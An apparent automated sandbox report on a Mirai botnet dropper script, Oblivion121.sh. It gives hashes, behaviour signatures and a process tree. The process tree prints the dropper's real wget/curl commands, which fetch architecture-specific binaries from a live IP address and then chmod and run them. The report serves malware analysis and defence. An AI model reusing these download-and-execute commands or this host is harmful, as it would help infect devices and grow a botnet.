Overview

overview

10

Static

static

1

Oblivion121.sh

ubuntu-18.04-amd64

10

Oblivion121.sh

debian-9-armhf

10

Oblivion121.sh

debian-9-mips

10

Oblivion121.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    29s
  • max time network
    31s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    15-12-2024 10:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Oblivion121.sh

  • Size

    1KB

  • MD5

    90e5e43e5d798a41934d7f30e8208b24

  • SHA1

    0748835c71a1c54c8ea6bc7d0baf831f12eb0ef7

  • SHA256

    09e9f78247105e4500f5722131940080633c40ba32803d3f4b5b370ae5ae6233

  • SHA512

    ea39caa2f2242cd2c46b6f8841fb6e4bb8defdb2fb2dfb831f0dde5cee12707dc1aebc920c1e0834bcc7fab1aeb5caf69cf3ba56f1e6d9a5b9c4bd7b87020032

Score
10/10
miraimiraibotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

MIRAI

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (6497) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 4 IoCs
  • Modifies Watchdog functionality 1 TTPs 6 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Enumerates active TCP sockets 1 TTPs 3 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads system network configuration 1 TTPs 3 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 9 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Oblivion121.sh
    /tmp/Oblivion121.sh
    1⤵
    • Writes file to tmp directory
    PID:730
    • /usr/bin/wget
      wget http://188.132.232.157/IGz/IGz.x86
      2⤵
      • Writes file to tmp directory
      PID:733
    • /usr/bin/curl
      curl -O http://188.132.232.157/IGz/IGz.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:751
    • /bin/cat
      cat IGz.x86
      2⤵
        PID:758
      • /bin/chmod
        chmod +x cp IGz.x86 Oblivion121.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-n9tqSN
        2⤵
        • File and Directory Permissions Modification
        PID:760
      • /tmp/cp
        ./cp x86
        2⤵
        • Executes dropped EXE
        PID:761
      • /usr/bin/wget
        wget http://188.132.232.157/IGz/IGz.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:764
      • /usr/bin/curl
        curl -O http://188.132.232.157/IGz/IGz.mips
        2⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:765
      • /bin/cat
        cat IGz.mips
        2⤵
        • System Network Configuration Discovery
        PID:766
      • /bin/chmod
        chmod +x cp IGz.mips IGz.x86 Oblivion121.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-n9tqSN
        2⤵
        • File and Directory Permissions Modification
        PID:767
      • /tmp/cp
        ./cp mips
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        PID:768
      • /usr/bin/wget
        wget http://188.132.232.157/IGz/IGz.mpsl
        2⤵
        • Writes file to tmp directory
        PID:772
      • /usr/bin/curl
        curl -O http://188.132.232.157/IGz/IGz.mpsl
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:781
      • /bin/chmod
        chmod +x cp IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-n9tqSN
        2⤵
        • File and Directory Permissions Modification
        PID:810
      • /tmp/cp
        ./cp mpsl
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:812
      • /usr/bin/wget
        wget http://188.132.232.157/IGz/IGz.arm4
        2⤵
          PID:817
        • /usr/bin/curl
          curl -O http://188.132.232.157/IGz/IGz.arm4
          2⤵
          • Writes file to tmp directory
          PID:828
        • /bin/chmod
          chmod +x cp IGz.arm4 IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-n9tqSN
          2⤵
          • File and Directory Permissions Modification
          PID:838
        • /tmp/cp
          ./cp arm4
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:839
        • /usr/bin/wget
          wget http://188.132.232.157/IGz/IGz.arm5
          2⤵
          • Writes file to tmp directory
          PID:844
        • /usr/bin/curl
          curl -O http://188.132.232.157/IGz/IGz.arm5
          2⤵
            PID:849

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/IGz.x86
          Filesize

          72KB

          MD5

          acd283bf65ed831dd470134f403a9294

          SHA1

          3c0f8231e8089430e32ef8daea73597170a2b4c0

          SHA256

          8d4e7068fc99a8f0fc7e2b095c206fda09ade9ea61091c40405e90dd6894ed67

          SHA512

          0847ba7306de9087cd0a4f79f20de2da0baffa1e2d8c09d509b3bd573122593c935b6e39076393d08b9e2da12d89b55f70cbb3c99d42175c4daca848f00a8c72

          Download Submit

        • /tmp/cp
          Filesize

          153KB

          MD5

          558fc8df865663836770a42334dd88c0

          SHA1

          0276f7274984928e64fbe354bb0df966d1eacb86

          SHA256

          b23789685e87bf3931a7cc2c8d33dcf4417332e5d5a5cd7778f97e063f8d9118

          SHA512

          561756714ec8c40ed714e350df57f3c494e0995cfb6e0ca9146d4b47651f66b20d2c11d0fd77f3f05b92ca4ec05f3ddfb532ac92287a316354d2ea432e3fea4e

          Download Submit